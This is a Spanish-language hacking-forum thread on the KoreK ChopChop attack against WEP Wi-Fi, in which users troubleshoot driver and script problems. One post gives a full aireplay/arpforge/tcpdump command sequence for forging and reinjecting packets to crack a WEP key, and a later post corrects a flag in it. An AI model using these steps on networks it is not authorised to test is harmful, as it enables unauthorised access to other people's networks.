 Autor
|
Tema: Ataque ChopChop de KoreK. Por o2T7f6j2 (Leído 20001 veces)
|
Uxio
Hacking Wireless
 Desconectado
Mensajes: 3.383
Volveré...
|
|
|
|
|
|
En línea
|
|
|
|
Armenos
Colaborador
Desconectado
Mensajes: 1.975
|
No me coge el ap cuando uso el script chochop-combo macAP channel. ¿Uxio conseguiste que te fuera? De nuevo gracias a canido por subir los scripts a internet  |
|
|
|
|
En línea
|
|
|
|
narmer
Desconectado
Mensajes: 21
|
Muchas gracias por los scrips esta tarde si puedo los pruebo y os cuento
Saludos!!
|
|
|
|
|
En línea
|
|
|
|
Uxio
Hacking Wireless
Desconectado
Mensajes: 3.383
Volveré...
|
A mí me da error el chopchop-prepare. No me carga el ath0raw.
Uso la versión madwifi-ng-r1486, ¿será por eso?
|
|
|
|
|
En línea
|
|
|
|
Armenos
Colaborador
Desconectado
Mensajes: 1.975
|
Yo los probé con esos drivers y también me fallaba, probé los número 5 de la página de hwagm y el chopchop-prepare funciona perfectamente, pero el combo no me asigna el ap  Un consejo, cuando hagas los chopchop, no haber hecho nada antes de airodump o poner el ath0 o el tuyo en modo monitor, o el chopchop-prepare te fallará. Otra cosa, si usaste tal cual los scripts, te recomiendo que alteres un poco el prepare, ya que hay líneas de información que te las puede confundir como comando. P.d. Creo que pueden fallar esos drivers debido a que te falta el sysctl (que no se ni donde está  o si te lo instala los drivers) y por eso no carga el ath0raw. |
|
|
|
|
En línea
|
|
|
|
alist3r
Desconectado
Mensajes: 18
Desde Debian con amor
|
cuando pueda os explico mejor lo del video y lo de los scripts, que veo que andais liaos XDDD de todos modos tengo k decir que es una autentica chapucilla cuya unica utilidad es teclear menos  por otro lado , si que es verda que a veces no engancha los AP (no aparece el essid despues de los 5 secs que le di de plazo al script). normalmente es porque la atheros ya esta hasta las narices de mis tonterias y está colgada (con lo k tengo k hacer ifdown ath0 && ifup ath0) , o bien porque ando lejos del AP.. la clave estaba tirada, era de 64 bits y ya me la sabia xDD voy a comer que tengo hambre ya XDDDD un saludo compis |
|
|
|
|
En línea
|
Debian rlz
|
|
|
Armenos
Colaborador
Desconectado
Mensajes: 1.975
|
Los scripts y el video se entienden perfectamente, el problema es que no engancha al AP. Ya probaré con otros aps, todo es pereza  |
|
|
|
|
En línea
|
|
|
|
alist3r
Desconectado
Mensajes: 18
Desde Debian con amor
|
Armenos, publicame las modificaciones que has hecho sobre mi chopchop-prepare, que yo soy muy deficiente en bash scripting y seguro k me puedes dar soluciones a algunos problemas que tengo a diario con ellos.
la manera ideal de usar el script prepare es editando el /etc/network/interfaces como le dije a canido por mail, añadiendo la linea
pre-up ath0 chopchop-prepare
porque si no no se puede cambiar la mac de la tarjeta y eventualmente el sysctl podria quedarse lelo.
a los que directamente les falla el sysctl esta claro que el driver que han obtenido no les permite el uso de ath0raw para capturar mientras inyectan y se asocian.
si hay mucho lio se puede mirar de pasaros algunos que tengamos ya parcheados, como de hecho ya me ha pedido algun compañero en privado. yo tambien me vi algo negro para encontrar una combinacion de parche + codigo fuente que casaran bien y compilaran sin errores.
saludoxxxx
|
|
|
|
|
En línea
|
Debian rlz
|
|
|
Armenos
Colaborador
Desconectado
Mensajes: 1.975
|
Los problemas que solucioné eran los típicos de copiar/pegar, cosas que quedan descuadradas y dan errores, .... Lo del sysctl tienes toda la razón, si los drivers no son los ideales fallan y no te dejan hacer nada. Ahora mismo estoy liado en otras cosas, pero he de probar aún lo del chopchop-combo que fijo que era por potencia, a malas le daré más tiempo para la conexión. Canido me remandó tu mail e hice lo de editar el etc/networks/interface con esa línea y el chopchop-prepare nunca me dio problemas. Cómo siempre, me acaban fallando las cosas por falta de potencia jejeje P.d. He de probar tus scripts bajo el puppy de opqa a ver que tal va. |
|
|
|
|
En línea
|
|
|
|
alist3r
Desconectado
Mensajes: 18
Desde Debian con amor
|
pero colegi mirate lo de la potencia a ver si vas a pillar mala fama delante de las hembrassssss
joasojasojasojasojasojas
ya me contareis, yo eske tengo un proyecto de traduccion de un software de la empresa y ando mas de culo que san patrássss
saludos!
|
|
|
|
|
En línea
|
Debian rlz
|
|
|
canido
Desconectado
Mensajes: 2.197
|
MI PRIMERA WEP CON CHOPCHOP Os resumo el proceso: Empecé a capturar con airodump y realice los típicos ataques 1+3 de aireplay pero no había forma de que empezara la reinyección (como ocurre a menudo ). Entonces decidí probar con 2 métodos que recomienda zero13: 1.- Poner como cliente falso la MAC del AP. Esto no resultó despues de esperar varios minutos. 2.- Como hoy tenía dos tarjetas, puse una en modo managed y me asocié a la red con una key falsa, mientras que con la otra tarjeta intenté el aireplay -3 con la MAC de la tarjeta anterior. Esto tampoco resulto despues de esperar un buen rato. Pero como a lo largo de todo este proceso conseguí algún que otro IV (en total tenía 8 ), decidí probar el chop-chop. Para ello me leí y releí este manual, así como el final de la Biblia e hice: 1.- Ataque 1 de aireplay para conseguir una asociación falsa: aireplay -1 30 -e [ssid] -a [MAC AP] -h [MAC inventada] wlan0 2.- Ataque 4 de aireplay para desencriptar un paquete: aireplay -4 -h [MAC AP] wlan0 3.- Vemos la dirección IP con tcpdump: tcpdump -s 0 -n -e -r [archivo generado con aireplay-4.cap] 4.- Utilizamos arpforge: arpforge [archivo generado con aireplay-4.xor] 1 [MAC Cliente Falso creado con aireplay-1] [MAC AP] [IP inventada] [IP AP] [archivoreinyeccion.cap] 5.- Ataque 3 de aireplay: aireplay -3 -b [MAC AP] -h [MAC Cliente falso] wlan0 -x 1024 -r [archivoreinyeccion.cap] Y los IVs empezaron a subir como la espuma Gracias o2... y saludos... |
|
|
|
|
En línea
|
|
|
|
Armenos
Colaborador
Desconectado
Mensajes: 1.975
|
Primero de todo canido felicidades Yo cuando o2T7f6j2 sacó el manual conseguí hacer el ataque chopchop a un ap que con los "ataques" normales no me iba, pero por suerte tenía algún data para probar este ataque. Ahora queda que me vaya lo de alist3r ...maldita señal .... y eso que funcionan bien los scripts |
|
|
|
|
En línea
|
|
|
|
alist3r
Desconectado
Mensajes: 18
Desde Debian con amor
|
felcidades machote! solo una cosilla mas: a veces me encuentro que un router no dice ni pio cuando me asocio a el, pero si me pongo a hacer pings (aun sabiendo que no voy a obtener respuesta porke estoy asociado con una clave mala) o bien a pedir dhcp, la cosa cambia y recibo un paquete que puedo desencriptar posteriormente  un saludo |
|
|
|
|
En línea
|
Debian rlz
|
|
|
o2T7f6j2
echo -e "Nos vemos en \n$(pwd)"
Desconectado
Mensajes: 2.783
./configure --enable-levitation --enable-diamagnet
|
MI PRIMERA WEP CON CHOPCHOP Gracias o2... y saludos... De nada. Aunque mejor que a mí, a Devine Enhorabuena por "el ascenso"  , ya iba siendo hora. Salu2 |
|
|
|
|
En línea
|
No debemos perder la fe en la humanidad que es como el océano: no se ensucia porque algunas de sus gotas estén sucias.Mahatma Gandhi (2 de Octubre del 1869 - 30 de Enero del 1948)
|
|
|
skan
Desconectado
Mensajes: 1.095
|
Hola, aunque es una chorradilla, creo que hay una errata,
donde pones
aireplay -4 -h [MAC AP] wlan0
deberia poner
aireplay -4 -h [MAC Cliente Falso] wlan0
o
aireplay -4 -b [MAC AP] -h [MAC Cliente] wlan0
Vamos, que detrás del -h va el cliente.
Y otra cosa.
Yo lo intento, me pregunta si me parece bien un utilizar un cierto paquete, le digo que chachi, y al ratito se supone que lo ha desencriptado pero aparece este mensaje:
ICV checksum verification failed!
¿Qué me sucede doctor?
¿Puedo continuar o si hay un error ya no vale la pena proseguir?
Y otra cosa
|
|
|
|
|
En línea
|
|
|
|
|
 |
